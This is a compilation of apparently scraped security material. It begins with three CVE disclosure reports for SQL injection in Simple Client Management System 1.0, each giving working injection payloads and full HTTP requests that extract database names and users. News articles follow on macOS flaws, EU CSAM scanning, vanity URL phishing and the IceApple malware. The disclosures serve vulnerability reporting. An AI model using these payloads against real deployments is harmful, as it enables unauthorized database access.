Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Users.php?f=delete.

Permalink

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Users.php?f=delete

Vulnerability location: /cms/classes/Users.php?f=delete,id

\[+\] Payload: id=11' and length(database()) =6 --+ // Leak place ---> id

Current database name: cms\_db,length is 6

POST /cms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.19
Content\-Length: 36
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=11' and length(database()) =6 --+ // Leak place ---> id

When length (database ()) = 6, Content-Length: 19 

When length (database ()) = 7, Content-Length: 168

CVE-2022-29981: bug_report/SQLi-8.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Master.php?f=delete_service.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Master.php?f=delete\_service

Vulnerability location: /cms/classes/Master.php?f=delete\_service, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /cms/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=maintenance/services
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29750: bug_report/SQLi-3.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Master.php?f=delete_client.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Master.php?f=delete\_client

Vulnerability location: /cms/classes/Master.php?f=delete\_client, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /cms/classes/Master.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.19
Content\-Length: 61
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=client
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29751: bug_report/SQLi-5.md at main · k0xx11/bug_report

Researcher shares how he unearthed newer bugs in Apple's operating system by closer scrutiny of previous research, including vulnerabilities that came out of the Pwn2Own competition.

Sometimes all it takes to root out a new software vulnerability is to study and analyze previous bug reports. That's how researcher Csaba Fitzl says he sniffed out some new Apple macOS vulnerabilities, one of which was a mirror image of a logic flaw that a group of researchers competing in the 2020 Pwn2Own contest found and executed there.

Fitzl, a content developer for Offensive Security, says he reread and studied the winning six-exploit chain that the researchers used to hack macOS. One of the exploits in that chain weaponized a privilege escalation bug, which Apple later fixed. But there still was a hole, and he found it: "Although Apple fixed it properly, but still there was an extra function ... that basically opened up another vulnerability to be utilized a bit differently than the original one," Fitzl explains.

Apple's original fix for the flaw allowed an attacker to change ownership of a directory in macOS. But Fitzl discovered that he could create a new directory on the targeted system, which could allow an attacker to escalate their privileges on macOS. "Although you had to use different techniques to get through to the system, but because you could create an arbitrary directory anywhere on the system, you could elevate your privileges to root," he says.

It was basically the same logic flaw but in a different piece of the code. Apple has since patched the vulnerability Fitzl found as well.

This week at Black Hat Singapore, Fitzl will share technical details of this and two other vulns he found while drilling down on previous vuln research on macOS during a session entitled "macOS Vulnerabilities Hiding in Plain Sight."

Apple had not responded to a request for comment as of this posting.

**'Something Is Not Right'  
**Fitzl says he didn't actually spot traces of the new flaws linked to previous research until after he reread the research papers. "At some point it hit me that there is something not right. It turned out that there is a vulnerability not like the one initially documented," he explains of his findings. "That eventually led to me to find or identify new vulnerabilities."

The other two flaws he found include one that built upon research from Mickey Jin, who discovered a bypass for an Apple patch for the so-called XCSSET malware that targeted Apple's built-in Transparency, Consent, and Control (TCC) privacy and security framework. XCSSET pilfers sensitive user and developer information from applications on a Mac machine.

Fitzl says he noticed an underlying weakness in the TCC framework that would allow an attacker to bypass TCC. He consulted with fellow researcher Wojciech Regula, head of mobile security and principal security consultant at SecuRing, on the issue.

"We found that we can still generically bypass TCC because there was an inherent vulnerability" that came out of the previous research, he says. It was a flaw in TCC that could allow an attacker to bypass the macOS privacy and security framework.

While macOS relies heavily on code-signing and verification of code-signing, Fitzl explains, TCC was not verifying a process that was running but rather verifying binary code on the disk. "This allowed all these abuses by malware," he says. "So we just replaced the binary on the disk and that's it: We could bypass TCC again."

Apple has since fixed the issue, he says.

The third macOS vuln Fitzl found builds off a flaw used in a 2017 Pwn2Own macOS exploit chain: another privilege escalation flaw that Apple later patched in its disk arbitration framework to elevate to root access. Then Fitzl found that the new version of Apple's disk arbitration source code included the "exact same" logic bug that could lead to privilege escalation. "You could use the same logic bug to escape the \[macOS\] sandbox" that keeps applications from getting access to other parts of the machine they don't need, he says.

For example, an attacker could abuse the vulnerability to escape Safari's sandbox and gain broader access across the victim's machine.

**Protecting macOS  
**Fitzl recommends that organizations religiously update their Macs with the latest versions of macOS to keep their endpoints protected from attacks such as these. They should also run anti-malware and endpoint detection and response on their machines.

Known macOS Vulnerabilities Led Researcher to Root Out New Flaws

The European Commission on Wednesday proposed new regulation that would require tech companies to scan for child sexual abuse material (CSAM) and grooming behavior, raising worries that it could undermine end-to-end encryption (E2EE).
To that end, online service providers, including hosting services and communication apps, are expected to proactively scan their platforms for CSAM as well as

The European Commission on Wednesday proposed new regulation that would require tech companies to scan for child sexual abuse material (CSAM) and grooming behavior, raising worries that it could undermine end-to-end encryption (E2EE).

To that end, online service providers, including hosting services and communication apps, are expected to proactively scan their platforms for CSAM as well as report, remove and disable access to such illicit content.

While instant messaging services like WhatsApp already rely on hashed versions of known CSAM to automatically block new uploads of images or videos matching them, the new plan requires such platforms to identify and flag new instances of CSAM.

"Detection technologies must only be used for the purpose of detecting child sexual abuse," the regulator said. "Providers will have to deploy technologies that are the least privacy-intrusive in accordance with the state of the art in the industry, and that limit the error rate of false positives to the maximum extent possible."

A new EU Centre on Child Sexual Abuse, which will be independently established to enforce the measures, has been tasked with maintaining a database of digital "indicators" of child sexual abuse, in addition to processing and forwarding legitimate reports for law enforcement action.

In addition, the rules require app stores to ensure that children are refrained from downloading apps that "may expose them to a high risk of solicitation of children."

The controversial proposal to clamp down on sexual abuse material comes days after a draft version of the regulation leaked earlier this week, prompting Johns Hopkins University security researcher Matthew Green to state that "This is Apple all over again."

The tech giant, which last year announced plans to scan and detect CSAM on its devices, has since delayed the rollout to "take additional time over the coming months to collect input and make improvements."

Meta, likewise, has postponed its plans to support E2EE across all its messaging services, WhatsApp, Messenger, and Instagram, until sometime in 2023, stating that it's taking the time to "get this right."

A primary privacy and security concern arising out of scanning devices for illegal pictures of sexual abuse is that the technology could weaken privacy by creating backdoors to defeat E2EE protections and facilitate large-scale surveillance.

This would also necessitate persistent plain-text access to users' private messages, effectively rendering E2EE incompatible and eroding the security and confidentiality of the communications.

"The idea that all the hundreds of millions of people in the E.U. would have their intimate private communications, where they have a reasonable expectation that that is private, to instead be kind of indiscriminately and generally scanned 24/7 is unprecedented," Ella Jakubowska, a policy advisor at European Digital Rights (EDRi), told Politico.

But the privacy afforded by encryption is also proving to be a double-edged sword, with governments increasingly fighting back over worries that encrypted platforms are being misused by malicious actors for terrorism, cybercrime, and child abuse.

"Encryption is an important tool for the protection of cybersecurity and confidentiality of communications," the commission said. "At the same time, its use as a secure channel could be abused of by criminals to hide their actions, thereby impeding efforts to bring perpetrators of child sexual abuse to justice."

The development underscores Big Tech's ongoing struggles to balance privacy and security while also simultaneously addressing the need to assist law enforcement agencies in their quest for accessing criminal data.

"The new proposal is over-broad, not proportionate, and hurts everyone's privacy and safety," the Electronic Frontier Foundation (EFF) said. "The scanning requirements are subject to safeguards, but they aren't strong enough to prevent the privacy-intrusive actions that platforms will be required to undertake."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

EU Proposes New Rules for Tech Companies to Combat Online Child Sexual Abuse

Attack technique bypasses email filters and burnishes credibility of phishing links

Attack technique bypasses email filters and burnishes credibility of phishing links

A failure to validate subdomains within so-called ‘vanity URLs’ by Box, Zoom, and Google Docs created a powerful way to enhance their phishing campaigns, security researchers have revealed.

Vanity URLs can be customized to include a brand name and a description of the link’s purpose (for example, brandname/registernow) and typically redirect to a longer, generic URL.

Widely used by software-as-a-service (SaaS) applications, vanity URLs are used to share or request files, invite users to register for events, and so on.

**False sense of security**

The vulnerabilities discovered in Box, Zoom, and Google Docs enable attackers to abuse the apparent reassurance vanity URLs offer recipients that they are dealing with a legitimate organization rather than cybercriminals.

Researchers from Varonis Threat Labs found that the SaaS applications validated vanity URLs’ URI (the unique sequence of characters at the end of the link), but not its descriptive subdomain (the portion preceding the URI).

Read more of the latest phishing news and attacks

“As a result, threat actors can use their own SaaS accounts to generate links to malicious content (files, folders, landing pages, forms, etc.) that appears to be hosted by your company’s sanctioned SaaS account,” reads a blog post published by Varonis Threat Labs.

“Achieving this is as easy as changing the subdomain in the link.”

**Hit rate**

This attack technique, as demonstrated in this video, would act to massively boost the success rate of phishing or malware distribution campaigns, according to Varonis CMO Rob Sobers.

“It can make a massive difference because spoofed links appear legitimate to security technologies like email filters and CASBs (Cloud Access Security Broker\],” Sobers told The Daily Swig.

“They would normally block a faked or misspelled URL (like apple-support.zoom.us). In this case, since we’re spoofing the REAL URL, there’s no way for these types of technologies to automatically filter or flag the URL as malicious.”

Sobers continued: “Also, savvy users can typically pick up on subtle differences when loading a fake URL in their browser – things like an invalid security certificate or misspelled subdomain. With this abuse, the URL and certificate are completely valid.”

Since three of the most widely used SaaS apps containing the same flaw, “it’s very likely that similar issues exist in other SaaS apps”, warned Sobers.

**Tell-tale signs**

Box, the popular cloud content management app, patched flaws affecting vanity URLs for file-sharing and public forms used to request files and associated information.

The file-sharing issue was exacerbated by an attacker’s ability to add password protection to malicious files and upload a targeted brand’s logo and recreate its color scheme, while the absence of branding on public forms makes it harder for victims to spot tell-tale design flaws.

A spokesperson from Zoom told The Daily Swig that it had addressed the potential abuse of vanity URLs for meeting recordings and webinar registration pages “by warning users if they are being redirected to a different subdomain”.

However, Varonis urged users to be “cautious when accessing branded Zoom links” given that “users often click through non-critical warning messages”.

Attackers could also brand a Google Form requesting sensitive confidential data with targeted company’s logo as yourcompanydomain.docs.google.com/forms/d/e/:form\_id/viewform.

“The form could require registering with an email from your company domain, making it seem more trustworthy,” said Varonis.

Google Doc documents exchanged via the ‘publish to web’ feature are similarly vulnerable.

Google is yet to roll out a fix, according to Varonis.

YOU MIGHT ALSO LIKE RuTube hack: Russian video platform denies loss of source code following cyber-attack

Box, Zoom, Google Docs offer phishing boost with ‘vanity URL’ flaws

Google on Wednesday took to its annual developer conference to announce a host of privacy and security updates, including support for virtual credit cards on Android and Chrome.
"When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number," Google's Jen Fitzpatrick

Google on Wednesday took to its annual developer conference to announce a host of privacy and security updates, including support for virtual credit cards on Android and Chrome.

"When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number," Google's Jen Fitzpatrick said in a statement.

The goal, the search giant, said to keep payment information safe and secure during online shopping and protect users from skimming attacks wherein threat actors inject malicious JavaScript code to plunder credit card numbers and sell them on the black market.

The feature is expected to roll out in the U.S. for Visa, American Express, Mastercard, and Capital One cards starting this summer.

Interestingly, while Apple offers an option to mask email addresses via Hide My Email, which enables users to create unique, random email addresses to use with apps and websites, it's yet to offer a similar option for creating virtual credit cards.

The development comes a week after Google, Apple, and Microsoft banded together to accelerate support for a common passwordless sign-in standard that allows "websites and apps to offer consistent, secure, and easy passwordless sign-ins to consumers across devices and platforms."

Additionally, Google said it's expanding phishing protections in Google Workspace to Docs, Slides and Sheets, and that it plans to debut a new "My Ad Center" later this year to give users more control over personalized ads on YouTube, Search, and Discover feed.

What's more, users would be able to request personally identifiable information such as email, phone number, or home address to be removed from search results through a new tool that will be accessible from the Google App.

Also coming is a new Account Safety Status setting that will "feature a simple yellow alert icon on your profile picture that will flag actions you should take to secure your account."

Other key privacy and security features unveiled at Google I/O 2022 include support for end-to-end encryption for group conversations in the Messages app for Android and the availability of on-device encryption for Google Password Manager.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Android and Chrome Users Can Soon Generate Virtual Credit Cards to Protect Real Ones

Researchers have detailed a previously undocumented .NET-based post-exploitation framework called IceApple that has been deployed on Microsoft Exchange server instances to facilitate reconnaissance and data exfiltration.
"Suspected to be the work of a state-nexus adversary, IceApple remains under active development, with 18 modules observed in use across a number of enterprise environments, as

Researchers have detailed a previously undocumented .NET-based post-exploitation framework called IceApple that has been deployed on Microsoft Exchange server instances to facilitate reconnaissance and data exfiltration.

"Suspected to be the work of a state-nexus adversary, IceApple remains under active development, with 18 modules observed in use across a number of enterprise environments, as of May 2022," CrowdStrike said in a Wednesday report.

The cybersecurity firm, which discovered the sophisticated malware in late 2021, noted its presence in multiple victim networks and in geographically distinct locations. Targeted victims span a wide range of sectors, including technology, academic, and government entities.

A post-exploitation toolset, as the name implies, is not used to provide initial access, but is rather employed to carry out follow-on attacks after having already compromised the hosts in question.

IceApple is notable for the fact that it's an in-memory framework, indicating an attempt on the part of the threat actor to maintain a low forensic footprint and evade detection, which, in turn, bears all hallmarks of a long-term intelligence-gathering mission.

While intrusions observed so far have involved the malware being loaded on Microsoft Exchange Servers, IceApple is capable of running under any Internet Information Services (IIS) web application, making it a potent threat.

The different modules that come with the framework equip the malware to list and delete files and directories, write data, steal credentials, query Active Directory, and export sensitive data. Build timestamps on these components date back to May 2021.

"At its core, IceApple is a post-exploitation framework focused on increasing an adversary's visibility of a target through acquisition of credentials and exfiltration of data," the researchers concluded.

"IceApple has been developed by an adversary with detailed knowledge of the inner workings of IIS. Ensuring all web applications are regularly and fully patched is critical to preventing IceApple from ending up in your environment."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple